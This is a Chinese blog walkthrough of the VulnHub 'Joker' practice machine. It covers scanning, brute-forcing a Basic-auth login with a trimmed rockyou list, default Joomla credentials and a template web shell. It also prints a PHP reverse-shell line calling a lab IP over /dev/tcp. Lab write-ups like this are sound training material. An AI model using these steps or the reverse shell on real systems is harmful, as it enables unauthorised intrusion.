vulhub-joker靶机

已于 2025-03-18 20:46:53 修改
阅读量518 收藏 4
点赞数 8
CC 4.0 BY-SA版权
文章标签: 安全
于 2025-03-18 20:17:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_85578339/article/details/146349480

1.下载打开靶机

下载地址:https://download.vulnhub.com/ha/joker.zip

2.扫描靶机ip

3.访问靶机ip

开启了的端口11尝试

4.扫描敏感目录

5.访问secret.txt

多次出现rock,指的是kali自带的rockyou.txt字典;100指的是取字典的前100个;再结合前文,可知应该采用爆破登录8080的网站

6.下载字典前100个

进入文档内,解压文件rockyou.txt.gz

head -n 100 /usr/share/wordlists/rockyou.txt > test.txt

7.bp抓包发现登录信息使用了base64编码

8.发送到instructer进行攻击

设置payload

添加payload值

设置规则

攻击

将结果进行base64解码

9.登录8080端口

10.发现是joomla框架的网页,其弱口令是joomla/joomla,尝试使用弱口令登陆后台

继续登录

11.寻找漏洞

尝试后台getshell:Extensions---templates---templates----beez3

12..新建木马

13.蚁剑连接

14.反弹shell

创建一个新文件写入反弹shell的php代码

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.174/6666 0>&1'");?>

访问666.php,kali监听

ksk852
关注
vulhub靶机joker渗透
qq_56666960的博客
02-07 3262
vulhub靶机joker渗透
vulhub/joker 靶机----练习攻略
qq_65379983的博客
03-18 910
一句话木马,蚁剑连接---添加请求头 vulhub/joker靶机练习
VulnHub渗透靶场-joker
m0_74631795的博客
10-02 1055
抓包后对认证信息(Basic后面的东西)base64解码发现,账号密码格式为"用户名:密码“(joker:123456)看到还有登录功能,该站点使用了joomlaCMS,尝试使用joomla的默认账号密码joomla进行登录。参考BP抓包内容填写下面内容(joker:hannah编码后为am9rZXI6aGFubmFo)使用用户名”joker“,密码”hannah“成功登录。3-3使用刚才导入的镜像创建一个容器实例。3-2查看可用镜像,检查是否导入成功。1.直接在蚁剑编写反弹木马。2.kali端开启监听。
Vulnhub靶机joker
weixin_53507480的博客
12-13 634
vulhub靶机joker黑盒渗透
vulhub靶场joker通关攻略
qq_62486841的博客
03-18 365
把爆破成功的http头验证信息也写入蚁剑。靶机ip为192.168.93.177。弱口令登录,账号密码都为joomla。开启了22,80,8080三个端口。secret.txt有对密码的提示。账号密码都是joomla。没有的话可以解压一下。
【渗透测试】——VulnHub靶机渗透实战 | HA:Joker
HinsCoder的博客
09-17 5122
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场。本文将从环境搭建、端口扫描、目录扫描到信息提取和突破8080端口,尽可能排除新版本遇到的环境Bug,详解介绍渗透测试全过程。如果你是新手小白,本文将带你一窥渗透测试的世界。
Vulnhub-GlasgowSmile:v-1.1
cr7lyl的博客
12-25 2086
记一次vulnhub的通关过程 对主机全面扫描: 只有22和80端口开启 然后对其进行目录扫描,在扫描时访问web服务(8.
Go-joker-Go编写的Clojure的小解释方言
08-14
Go-joker是一个用Go语言实现的Clojure方言解释器,旨在提供一种轻量级的方式,让开发者能够在Go环境中运行和测试Clojure代码。这个项目由candid82开发,版本号为8063528,展示了Go语言在实现编程语言解释器方面的...
iosched-ibeacon-for-joker
05-17
Google I / O Android应用 Google I / O每年召开一次开发者大会,为期两天,内容丰富,包括技术会议和来自开发人员的数百个展示其技术的演示。 该项目是会议的Android应用程序。 该应用程序支持运行Android 4.0+的...
udacity-bicentennial-joker
05-12
适用于Android和Java Final Project的Gradle 在此项目中,您将创建一个具有多种风格的应用程序,该应用程序使用多个库和Google Could Endpoints。 完成的应用程序将包含四个模块。 一个提供笑话的Java库,一个为...
The-Joker123_BigData_beauty_analysis_13768_1753354839109.zip
07-28
在大数据时代,数据分析已经成为了众多企业和研究机构不可或缺的一部分。本压缩包文件“BigData_beauty_analysis_13768_1753354839109.zip”即是关于大数据在美丽产业中的应用分析项目。从文件名可以推测,该项目的...
geneo-joker
03-14
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
Fabarta个人专属智能体限时体验中:高效、安全的长文写作新搭档
Fabarta的博客
08-01 409
此外,报告还提到了数据孤岛、数据质量不高的问题,这些都阻碍了企业的跨域协同,也降低了企业的数据向知识转化的效率。在保证用户的资料、文件与数据完全私密不泄露的情况下,该产品完美融合了用户本地数据与互联网上可以触达的公开信息,快速应答用户的各类请求与问题。1)王律师基于个人构建好的本地知识库,输入需求:“分析本案胜诉关键点,撰写金融借款合同纠纷证据规则实务指南,引用3个类案,字数2000左右”;5)智能体生成专业化内容,王律师可实时调整个别段落,对不满意的段落进行改写、润色,插入类案对比等;
星图云开发者平台赋能商储油安全管控数字化转型
DevMate的博客
08-05 342
某商业储备油分公司是其集团公司国家原油商业储备的生产经营主体,肩负着15座跨省市油库的安全管理重任。在传统管理模式下,总部对分散库区的监管面临严峻挑战:由于地理位置分散,储罐液位波动、设备异常运行等关键状态无法实时获取,往往依赖人工逐级上报导致决策滞后;各库区独立建设的安防系统、设备监测平台数据格式互不兼容,标准不统一,形成数据协同壁垒;当突发泄漏或火灾险情时,应急资源调度依赖电话协调与纸质预案,响应效率难以满足快速处置要求。
Goby 漏洞安全通告| NestJS DevTools /inspector/graph/interact 命令执行漏洞(CVE-2025-54782)
m0_46699477的博客
08-05 186
其 /inspector/graph/interact 接口存在远程代码执行漏洞(CVE-2025-54782)。攻击者可以通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。该漏洞允许攻击者通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。
Web 安全之开放重定向攻击(Open Redirect )详解
路多辛的所思所想
08-03 941
摘要: 开放重定向漏洞存在于网站不安全处理用户可控URL时,攻击者通过构造恶意链接将用户从可信网站重定向至钓鱼或恶意网站。攻击流程包括诱骗用户点击、服务器执行重定向、最终实施窃取信息等攻击。防范措施包括避免直接使用用户输入URL、实施白名单验证、使用相对路径及重定向确认页面。该漏洞虽不直接破坏系统,但会显著提高钓鱼攻击成功率,需通过严格验证和定期安全审计加以防范。(149字)
Python包安全工程实践:构建安全可靠的Python生态系统
最新发布
Programming Talk
08-05 209
建立了安全开发流程与规范实现了依赖安全管理与漏洞扫描应用了现代加密与安全通信技术设计了认证授权系统集成了安全审计与监控实施了漏洞管理与应急响应应用了安全测试技术保障了供应链安全完整安全示例可在GitHub查看:[安全工程示例仓库]零信任架构应用运行时应用自保护(RASP)机密计算技术合规自动化(如GDPR、CCPA)
安全扫描:目标主机支持RSA密钥交换问题
weixin_50859396的博客
08-04 740
Nginx中禁用RSA加密算法需配置ssl_ciphers排除所有含RSA的套件,仅保留ECDSA等非RSA算法。具体步骤:1)修改配置文件,设置ssl_ciphers为HIGH:!aNULL:!MD5:!RSA;2)推荐使用ECDSA证书;3)验证配置后重载Nginx。注意事项:需确保使用ECDSA证书避免兼容问题,且评估客户端支持情况。该方案能提升安全性,避免RSA潜在风险。
OAuth 2.0 的安全升级版授权协议 OAuth 2.1 详解
路多辛的所思所想
08-02 700
OAuth 2.1 是对 OAuth 2.0 协议的一次重大更新,废弃了不安全的用法,整合了最新的安全实践,从而提高了协议的安全性和易用性。虽然“OAuth 2.1”从名称上看起来像是一个全新的版本,但实际上并非对 OAuth 2.0 的彻底的颠覆,其实是 OAuth 2.0 的最佳实践集合,整合了多年来社区反馈的最佳使用方式并做了必要的安全性改进。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值